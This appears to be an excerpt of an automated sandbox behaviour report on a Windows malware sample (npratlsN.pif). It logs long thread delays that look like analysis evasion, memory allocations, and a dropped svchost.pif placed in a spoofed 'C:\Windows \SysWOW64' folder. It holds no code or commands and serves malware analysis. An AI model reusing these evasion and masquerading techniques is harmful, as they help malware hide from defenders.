Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\npratlsN.pif	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 29A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2B800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2B530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 212E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 21780000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 216A0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2BC30000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2BE90000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\npratlsN.pif	Memory allocated: 2BCD0000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\npratlsN.pif

10_2_004019F0

Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598905	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598137	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596145	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595928	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595139	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594588	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594477	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594369	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599734
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599625
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599516
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599407
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599282
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599172
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599063
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598938
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598813
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598688
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598563
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598453
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598344
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598219
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597594
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597466
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597354
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597244
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597135
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597022
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596750
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596639
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596494
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596321
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596178
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596032
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595859
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595730
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595571
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595374
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594932
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594741
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594609
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594437
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594254
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594059
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593755
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593611
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593489
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593364
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593239
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593114
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592989
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592849
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592679
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592567
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592443
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592318
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592193
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592068
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591943
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591818
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591693
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591568
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591443
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591318
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591193
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599890
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598687
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598467
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598359
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598250
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598140
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598031
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597922
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597812
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597703
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597593
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597484
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597375
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597265
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597156
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597047
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596937
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596828
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596718
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596609
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596499
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596390
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596281
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596172
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596062
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595953
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595842
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595734
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595625
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595515
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595406
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595296
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595187
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595078
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594956
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594828
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594718
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594609

Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 9417	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 438	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 2874
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 6880
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 1935
Source: C:\Users\Public\Libraries\npratlsN.pif	Window / User API: threadDelayed 7919

Source: C:\Windows\SysWOW64\brightness.exe

Dropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pif

Jump to dropped file

Source: C:\Users\Public\Libraries\Nsltarpn.PIF

API coverage: 9.9 %

Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7884	Thread sleep count: 9417 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7884	Thread sleep count: 438 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598905s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598137s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -596145s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595928s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595139s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -594921s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -594588s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -594477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7892	Thread sleep time: -594369s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep count: 35 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 4828	Thread sleep count: 2874 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599734s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 4828	Thread sleep count: 6880 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599625s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599516s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599407s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599282s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599172s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -599063s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598938s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598813s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598688s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598563s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598453s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598344s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598219s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -598110s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597985s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597860s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597735s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597594s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597466s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597354s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597244s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597135s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -597022s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596860s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596750s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596639s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596494s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596321s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596178s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -596032s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -595859s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -595730s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -595571s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -595374s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -594932s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -594741s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -594609s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -594437s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -594254s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -594059s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -593755s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -593611s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -593489s >= -30000s
